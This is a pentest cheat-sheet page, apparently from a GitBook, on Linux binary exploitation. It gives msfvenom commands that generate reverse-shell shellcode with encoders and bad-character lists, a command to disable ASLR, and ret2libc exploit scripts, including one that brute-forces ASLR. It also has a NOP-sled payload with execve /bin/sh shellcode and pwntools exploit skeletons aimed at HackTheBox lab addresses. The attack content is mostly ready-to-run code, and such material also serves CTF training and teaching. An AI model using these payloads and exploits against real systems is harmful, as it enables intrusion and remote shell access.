Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  • Very Basic
  • 00. Basic Checks
  • 01. ret2libc (NX enabled)
  • 02. NOP sled (NX disabled)
  • 03. PWNtool Skeletons
  • 04. GDB
  • 05. OBJDump
  1. Binary Exploitation

Linux

Very Basic

# -----------| General Purpose Registers (32bit)
EAX        # Arithmetic and Logical Instructions
EBX        # Base Pointer for Memory Addresses
ECX        # Loop, Shift, Rotation Counter
EDX        # I/O Port Addressing, Multiplication, Division
ESI        # Pointer of data and source in string copy operations  (Source Index)  
EDI        # Pointer of data and destination in string copy operations  (Destination Index)

# -----------| Stack (32bit)
ESP        # The Stack Pointer (Store pointers)
EBP        # The Base Pointer
EIP        # The Instruction Pointer (Will tell what execute next!!)
  • Create shell code

# -----------| Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c 
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -e x86/shikata_ga_nai  -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai  -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"    

# -----------| Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -b "\x00"     

00. Basic Checks

# -----------| CPU architecture information 
lscpu 

# -----------| I4-64 System Calls
cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h

# -----------| checksec info
checksec <FileName>
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled            <-- we can't drop shell code and jump to it; so use return to lib.c        
    PIE:      No PIE (0x8048000)

# -----------| Disable ASLR (Address Space Layout Randomization)
echo 0 > /proc/sys/kernel/randomize_va_space

# -----------| Create pattern 
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

# -----------| Check offset value
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_VALUE>
  • Get all functions

readelf -s BasicOne | grep FUNC

01. ret2libc (NX enabled)

# -----------| Check ASLR changing ?
for i in {1..20}; do ldd <FileName> | grep libc; done
  • Return to libc** [ ASLR OFF ]**

import struct

# pwndbg + create cyclic + find offset 
junk = "A"*52

# ldd <FileName>| grep libc <-- find the libc 
libc = 0xb7e19000

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
system = struct.pack('<I', libc + 0x0003ada0)

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- It does not really matters    
exit = struct.pack('<I',libc + 0x000b07c8)

# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh =struct.pack('<I',libc + 0x0015ba0b)

payload = junk + system + exit + binsh
print payload
  • Return to libc [ ASLR ON (Bruteforce) ]

from subprocess import call
import struct

# pwndbg + create cyclic + find offset 
junk = "A"*112

# ldd <FileName>| grep libc <-- find the libc 
libc = 0xb75b8000

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
system = struct.pack('<I', libc + 0x00040310)

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- It does not really matters    
exit = struct.pack('<I',libc + 0x00033290)

# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh =struct.pack('<I',libc + 0x00162bac)

buff = junk
buff += system
buff += exit
buff += binsh

for i in range(513):
   print "Trying: %s" %i
   ret = call(["/programe/file/path", buff])

02. NOP sled (NX disabled)

## ------------------| x86 Bit
BUF_SIZE = 362

SHELL_CODE  = "\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += "\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += "\xcd\x80\x31\xc0\x40\xcd\x80"
EIP = "?" ## 0xbffff4c0 --> \xc0\xf4\xff\xbf

NOP_SLED = "\x90"*(BUF_SIZE-len(SHELL_CODE))

payload = NOP_SLED + SHELL_CODE + EIP
print payload 

03. PWNtool Skeletons

  • ret2libc (32 bit)

#!/usr/bin/python3
from pwn import *

context(terminal=['tmux','new-window'])
#context(os='linux', arch='i386')

# If programe in local mode
#programe = gdb.debug('./myapp','b main')

# IF programe to remote mode
programe = remote('10.10.10.61',32812)

junk = ("A" * 212).encode()

# run gdb one then CTRL+C to brackground then type p system
system = p32(0xf7e4c060)

# type p exit on gdb
exit = p32(0xf7e3faf0)
 
# type find &system,+9999999,"sh" on gdb
# select one and then type x/s 0xf7f6ddd5 
binsh = p32(0xf7e3faf0)

#programe.recvuntil('What do you want me to echo back?')
programe.recvuntil('Enter Bridge Access Code:')
programe.sendline("Something")
programe.sendline(junk + system + exit + binsh)

programe.interactive()
from pwn import *

#context(terminal=['tmux','new-window'])
context(os='linux', arch='amd64')

# Load programe in local mode
programe = gdb.debug('./myapp','b main')

# Load programe to remote mode
programe = remote('10.10.10.147',1337)

junk = ("A" * 112).encode()
bin_sh = "/bin/sh\x00".encode()
system = p64(0x40116e)
pop_r13 = p64(0x401206)
null = p64(0x0)
test = p64(0x401152)

#programe.recvuntil('What do you want me to echo back?')
programe.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
programe.interactive()

04. GDB

  • GDB-def

# -----------| load programe
gdb-gef ./myapp

# -----------| Run programe
run
r

# -----------| Create pattern
pattern create 200

# -----------| Search RSP or EIP
pattern search $rsp
pattern search $eip
pattern search qaaa
pattern search 0x00007fffffffe288

# -----------| Show registers
registers
  • GDB-Peda

# -----------| load programe
gdb-peda ./myapp

# -----------| Run programe
run
r

# -----------| Get memory address on system (!! run programe before get this)
p system

# -----------| Get memory address on bin/sh; get the value on libc : (!! run programe before get this)
searchmem /bin/sh

# -----------| Get memory address on exit
p exit

05. OBJDump

objdump -D myapp | grep system   
PreviousBinary ExploitationNextWindows

Last updated 2 years ago

🔗